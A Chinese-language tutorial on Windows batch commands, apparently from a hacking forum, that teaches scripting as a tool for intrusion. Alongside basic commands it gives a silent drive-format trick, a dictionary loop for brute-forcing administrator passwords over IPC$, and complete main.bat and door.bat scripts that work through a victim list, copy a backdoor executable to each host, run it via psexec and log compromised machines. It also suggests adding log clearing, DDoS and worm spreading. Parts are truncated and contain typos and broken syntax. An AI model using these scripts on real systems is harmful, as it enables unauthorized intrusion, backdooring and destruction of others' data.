一.簡單批處理內部命令簡介 1.Echo 命令 打開回顯或關閉請求回顯功能,或顯示消息。如果沒有任何參數,echo 命令將顯示當前回顯設置。 語法 echo [{on|off}] [message] Sample:@echo off / echo hello world 在實際應用中我們會把這條命令和重定向符號(也稱為管道符號,一般用> >> ^)結合來實現輸入一些命令到特定格式的文件中.這將在以后的例子中體現出來。
2.@ 命令 表示不顯示@后面的命令,在入侵過程中(例如使用批處理來格式化敵人的硬盤)自然不能讓對方看到你使用的命令啦。 Sample:@echo off @echo Now initializing the program,please wait a minite... @format X: /q/u/autoset (format 這個命令是不可以使用/y這個參數的,可喜的是微軟留了個autoset這個參數給我們,效果和/y是一樣的。)
3.Goto 命令 指定跳轉到標簽,找到標簽后,程序將處理從下一行開始的命令。 語法:goto label (label是參數,指定所要轉向的批處理程序中的行。) Sample: if {%1}=={} goto noparms if {%2}=={} goto noparms(如果這里的if、%1、%2你不明白的話,先跳過去,后面會有詳細的解釋。) @Rem check parameters if null show usage :noparms echo Usage: monitor.bat ServerIP PortNumber goto end 標簽的名字可以隨便起,但是最好是有意義的字母啦,字母前加個:用來表示這個字母是標簽,goto命令就是根據這個:來尋找下一步跳到到那里。最好有一
些說明這樣你別人看起來才會理解你的意圖啊。
4.Rem 命令 注釋命令,在C語言中相當與/*--------*/,它并不會被執行,只是起一個注釋的作用,便于別人閱讀和你自己日后修改。 Rem Message Sample:@Rem Here is the description.
5.Pause 命令 運行 Pause 命令時,將顯示下面的消息: Press any key to continue . . . Sample: @echo off :begin copy a:*.* d:\back echo Please put a new disk into driver A pause goto begin 在這個例子中,驅動器 A 中磁盤上的所有文件均復制到d:\back中。顯示的注釋提示您將另一張磁盤放入驅動器 A 時,pause 命令會使程序掛起,以便您更換
7.start 命令 調用外部程序,所有的DOS命令和命令行程序都可以由start命令來調用。 入侵常用參數: MIN 開始時窗口最小化 SEPARATE 在分開的空間內開始 16 位 Windows 程序 HIGH 在 HIGH 優先級類別開始應用程序 REALTIME 在 REALTIME 優先級類別開始應用程序 WAIT 啟動應用程序并等候它結束 parameters 這些為傳送到命令/程序的參數 執行的應用程序是 32-位 GUI 應用程序時,CMD.EXE 不等應用程序終止就返回命令提示。如果在命令腳本內執行,該新行為則不會發生。 8.choice 命令 choice 使用此命令可以讓用戶輸入一個字符,從而運行不同的命令。使用時應該加/c:參數,c:后應寫提示可輸入的字符,之間無空格。它的返回碼為1234…
… 如: choice /c:dme defrag,mem,end 將顯示 defrag,mem,end[D,M,E]? Sample: Sample.bat的內容如下: @echo off choice /c:dme defrag,mem,end if errorlevel 3 goto defrag (應先判斷數值最高的錯誤碼) if errorlevel 2 goto mem if errotlevel 1 goto end
:defrag c:\dos\defrag goto end :mem mem goto end :end echo good bye
此文件運行后,將顯示 defrag,mem,end[D,M,E]? 用戶可選擇d m e ,然后if語句將作出判斷,d表示執行標號為defrag的程序段,m表示執行標號為mem的程序
FOR /F ["options"] %variable IN (file-set) DO command FOR /F ["options"] %variable IN ("string") DO command FOR /F ["options"] %variable IN ('command') DO command
或者,如果有 usebackq 選項:
FOR /F ["options"] %variable IN (file-set) DO command FOR /F ["options"] %variable IN ("string") DO command FOR /F ["options"] %variable IN ('command') DO command
利用For命令來實現對一臺目標Win2k主機的暴力密碼破解。 我們用net use \ip\ipc$ "password" /u:"administrator"來嘗試這和目標主機進行連接,當成功時記下密碼。 最主要的命令是一條:for /f i% in (dict.txt) do net use \ip\ipc$ "i%" /u:"administrator" 用i%來表示admin的密碼,在dict.txt中這個取i%的值用net use 命令來連接。然后將程序運行結果傳遞給find命令-- for /f i%% in (dict.txt) do net use \ip\ipc$ "i%%" /u:"administrator"|find ":命令成功完成">>D:\ok.txt ,這樣就ko了。
列,一般就是 ip password username。 代碼雛形: --------------- cut here then save as a batchfile(I call it main.bat ) --------------------------- @echo off @if "%1"=="" goto usage @for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k @goto end :usage @echo run this batch in dos modle.or just double-click it. :end --------------- cut here then save as a batchfile(I call it main.bat ) ---------------------------
------------------- cut here then save as a batchfile(I call it door.bat) ----------------------------- @net use \%1\ipc$ %3 /u:"%2" @if errorlevel 1 goto failed @echo Trying to establish the IPC$ connection …………OK @copy windrv32.exe\%1\admin$\system32 if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>ko.txt @psexec \%1 c:\winnt\system32\windrv32.exe @psexec \%1 net start windrv32 if not errorlevel 1 echo %1 Backdoored >>ko.txt :failed @echo Sorry can not connected to the victim. ----------------- cut here then save as a batchfile(I call it door.bat) -------------------------------- 這只是一個自動種植后門批處理的雛形,兩個批處理和后門程序(Windrv32.exe),PSexec.exe需放在統一目錄下.批處理內容 尚可擴展,例如:加入清除日志+DDOS的功能,加入定時添加用戶的功能,更深入一點可以使之具備自動傳播功能(蠕蟲).此處不多做敘述,有興趣的朋友可自行研究.
二.如何在批處理文件中使用參數 批處理中可以使用參數,一般從1%到 9%這九個,當有多個參數時需要用shift來移動,這種情況并不多見,我們就不考慮它了。 sample1:fomat.bat @echo off if "%1"=="a" format a: :format @format a:/q/u/auotset @echo please insert another disk to driver A. @pause @goto fomat 這個例子用于連續地格式化幾張軟盤,所以用的時候需在dos窗口輸入fomat.bat a,呵呵,好像有點畫蛇添足了~^_^ sample2: 當我們要建立一個IPC$連接地時候總要輸入一大串命令,弄不好就打錯了,所以我們不如把一些固定命令寫入一個批處理,把肉雞地ip password username 當
著參數來賦給這個批處理,這樣就不用每次都打命令了。 @echo off @net use %\ipc$ "2%" /u:"3%" 注意哦,這里PASSWORD是第二個參數。 @if errorlevel 1 echo connection failed 怎么樣,使用參數還是比較簡單的吧?你這么帥一定學會了^_^.
三.如何使用組合命令(Compound Command)
1.
Usage:第一條命令 第二條命令 [ 第三條命令...]
用這種方法可以同時執行多條命令,而不管命令是否執行成功
Sample: C:\&;dir z: dir c:\Ex4rch The system cannot find the path specified. Volume in drive C has no label. Volume Serial Number is 0078-59FB
